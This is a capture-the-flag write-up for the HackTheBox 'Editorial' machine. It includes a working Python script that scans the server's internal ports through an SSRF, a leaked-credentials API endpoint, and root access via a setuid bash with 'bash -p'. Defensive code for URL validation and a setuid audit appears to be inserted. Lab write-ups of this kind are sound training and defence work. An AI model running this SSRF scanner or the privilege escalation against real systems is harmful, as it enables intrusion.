Editorial Write Up on HackTheBox

Before all

A pretty easy box (?)
But writing the script was fun owo, and I got to practise some common tricks.
Attacker's IP: 10.10.14.58
Victim's IP: 10.10.11.20
Victim's host: editorial.htb

Write up

RECON

port scan

command:

rustscan -a 10.10.11.20 --ulimit 5000 -- -sC -sV -Pn

result:
image

Nothing unusual: port 22 (SSH) and port 80 (web) are open.
I also brute-forced paths afterwards, but that gave no way in.

Exploit

SSRF

Visiting http://editorial.htb/upload shows a "book information" page that lets you supply an image URL, which the server then fetches itself.

image

The body of the POST request that goes out:

-----------------------------36038148391578841867765834101
Content-Disposition: form-data; name="bookurl"

http://10.10.14.58:9999/NoGameNoLife.png
-----------------------------36038148391578841867765834101
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream


-----------------------------36038148391578841867765834101--

Use the SSRF to scan the server's own ports: when the fetch fails, the server answers with the default image path stored in expected_response, so any other response means that port answered.
enum-port.py

import concurrent.futures

import requests as req
from tqdm import tqdm

url = "http://editorial.htb/upload-cover"
boundary = "14276312323520530593225841561"
# Path of the placeholder image the server returns when it cannot fetch the URL
expected_response = '/static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg'


def make_request(i):
    # Hand-built multipart body: bookurl points at a loopback port, bookfile is left empty
    data = (
        f'--{boundary}\r\n'
        'Content-Disposition: form-data; name="bookurl"\r\n\r\n'
        f'http://127.0.0.1:{i}/\r\n'
        f'--{boundary}\r\n'
        'Content-Disposition: form-data; name="bookfile"; filename=""\r\n'
        'Content-Type: application/octet-stream\r\n\r\n\r\n'
        f'--{boundary}--\r\n'
    )

    headers = {
        'Content-Type': f'multipart/form-data; boundary={boundary}'
    }

    try:
        web = req.post(url, data=data, headers=headers)
        # Anything other than the placeholder path means the port answered
        if web.text != expected_response:
            print(web.text, f'port : {i}')
    except req.RequestException as e:
        print(f"Request failed for port {i}: {e}")


def main():
    # 50 threads over all 65535 ports, with a tqdm progress bar
    with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:
        list(tqdm(executor.map(make_request, range(1, 65536)), total=65535))


if __name__ == "__main__":
    main()

Result:
image

One of the hits dumped this:

{
"messages": [
{
"promotions": {
"description": "Retrieve a list of all the promotions in our library.",
"endpoint": "/api/latest/metadata/messages/promos",
"methods": "GET"
}
},
{
"coupons": {
"description": "Retrieve the list of coupons to use in our library.",
"endpoint": "/api/latest/metadata/messages/coupons",
"methods": "GET"
}
},
{
"new_authors": {
"description": "Retrieve the welcome message sended to our new authors.",
"endpoint": "/api/latest/metadata/messages/authors",
"methods": "GET"
}
},
{
"platform_use": {
"description": "Retrieve examples of how to use the platform.",
"endpoint": "/api/latest/metadata/messages/how_to_use_platform",
"methods": "GET"
}
}
],
"version": [
{
"changelog": {
"description": "Retrieve a list of all the versions and updates of the api.",
"endpoint": "/api/latest/metadata/changelog",
"methods": "GET"
}
},
{
"latest": {
"description": "Retrieve the last version of api.",
"endpoint": "/api/latest/metadata",
"methods": "GET"
}
}
]
}

The /api/latest/metadata/messages/authors endpoint is the one that hands over the SSH credentials.
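For the defender's side of the same bug, here is the URL-validation gate the upload handler should have run on bookurl before fetching it. This is an added example written for this write-up, not code from the box or from the author; the function names check_fetch_url, is_public_ip and resolve_all, the hostname cdn.example and the resolver answers used below are assumptions. It refuses every class of target the scan above relies on (loopback, private ranges, non-default ports, non-http schemes) and resolves hostnames to all of their addresses before deciding.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Assumption: the upload form's "bookurl" field is passed through check_fetch_url
# before the server opens any connection. Only plain http/https on the default
# ports to a globally routable address is accepted.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}


def resolve_all(host):
    """Return every address a hostname maps to (A and AAAA), or [] if it does not resolve."""
    try:
        infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def is_public_ip(ip_str):
    """True only for a globally routable unicast address.

    IPv4-mapped IPv6 (::ffff:127.0.0.1) is unwrapped so it cannot smuggle loopback
    past an IPv4-only blocklist; is_global already excludes RFC 1918 space, loopback,
    link-local (169.254.0.0/16, where cloud metadata services live) and the other
    reserved ranges.
    """
    ip = ipaddress.ip_address(ip_str)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return bool(ip.is_global and not ip.is_multicast)


def check_fetch_url(url, resolver=resolve_all):
    """Return (ok, reason) for a user-supplied URL the server is asked to fetch.

    `resolver` is injectable so the check can be exercised without DNS.
    """
    try:
        parsed = urlparse(url)
        port = parsed.port  # raises ValueError on a malformed or out-of-range port
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parsed.scheme!r} not allowed"
    host = parsed.hostname
    if not host:
        return False, "missing host"
    if parsed.username or parsed.password:
        return False, "credentials in URL not allowed"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"

    # A literal IP needs no lookup; a hostname must be checked against *every*
    # answer, because an attacker-controlled zone can mix public and internal records.
    try:
        ipaddress.ip_address(host)
        addrs = [host]
    except ValueError:
        addrs = resolver(host)
    if not addrs:
        return False, f"{host} does not resolve"
    for addr in addrs:
        if not is_public_ip(addr):
            return False, f"{host} -> {addr} is not a public address"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("http://127.0.0.1:5000/", "http://[::ffff:127.0.0.1]/",
                      "file:///etc/passwd", "http://169.254.169.254/latest/meta-data/"):
        print(candidate, check_fetch_url(candidate))
```

Two caveats when wiring this in: the fetcher must connect to the address that was validated (pin it, rather than letting the HTTP library resolve the name a second time, which reopens the DNS-rebinding window), and every redirect hop has to go back through check_fetch_url, otherwise a public host that 302s to 127.0.0.1:5000 gets the same result as the scan above.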

Privilege Escalation

bash SUID???

image

bash -p ends the round…
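A setuid bash is exactly the kind of thing a host audit should catch before anyone needs to type bash -p. The script below is an added example for this write-up, not code from the box or the author: it walks a tree, reports every regular file with the setuid bit, and rates a shell or interpreter as critical because, started with euid 0 and -p, it keeps that euid for whoever runs it. The function names find_suid, build_demo_tree and demo, the INTERPRETERS list and the constructed sample tree are assumptions.

```python
import os
import stat
import tempfile

# Names that should never carry the setuid bit: a shell or interpreter running with
# euid 0 (bash keeps it only with -p, which is the step in the write-up) is a root
# shell for any local user. Assumed list; extend it to match the host.
INTERPRETERS = {"bash", "sh", "dash", "zsh", "ksh", "python3", "perl"}


def find_suid(root, expected=frozenset()):
    """Walk `root` and report every regular file with the setuid bit set.

    `expected` is the host's baseline of legitimate setuid paths (passwd, sudo, ...).
    Severity: critical = shell/interpreter, info = on the baseline, review = anything else.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: the bit only matters on the real file
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not (st.st_mode & stat.S_ISUID):
                continue
            if name in INTERPRETERS:
                severity = "critical"
            elif path in expected:
                severity = "info"
            else:
                severity = "review"
            findings.append({
                "path": path,
                "mode": oct(stat.S_IMODE(st.st_mode)),
                "owner_uid": st.st_uid,
                "severity": severity,
            })
    return sorted(findings, key=lambda f: f["path"])


def build_demo_tree():
    """Constructed sample tree: a setuid bash (the box's misconfiguration), a setuid
    passwd (legitimate) and a plain ls. Returns the temporary root directory."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    bindir = os.path.join(root, "bin")
    os.makedirs(bindir)
    for name, mode in (("bash", 0o4755), ("passwd", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")  # write first: a write by the owner clears setuid
        os.chmod(path, mode)
    return root


def demo():
    """Audit the constructed tree and map each basename to its severity."""
    root = build_demo_tree()
    baseline = {os.path.join(root, "bin", "passwd")}
    return {os.path.basename(f["path"]): f["severity"] for f in find_suid(root, baseline)}


if __name__ == "__main__":
    for name, severity in demo().items():
        print(f"{severity:8} {name}")
```

On a real host run find_suid("/") as root with a baseline taken from a clean install of the same distribution release, and treat every "critical" or "review" entry as a change to explain; the fix for a setuid shell is simply chmod u-s on that binary.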

After all

An easy one; it soothed my mood after getting wrecked by the APCS concept questions again today.
Midterms and the qualifying exam are coming up qwq.
This season I'll probably only reach Silver; I'll work harder next season (if nothing else gets in the way).
image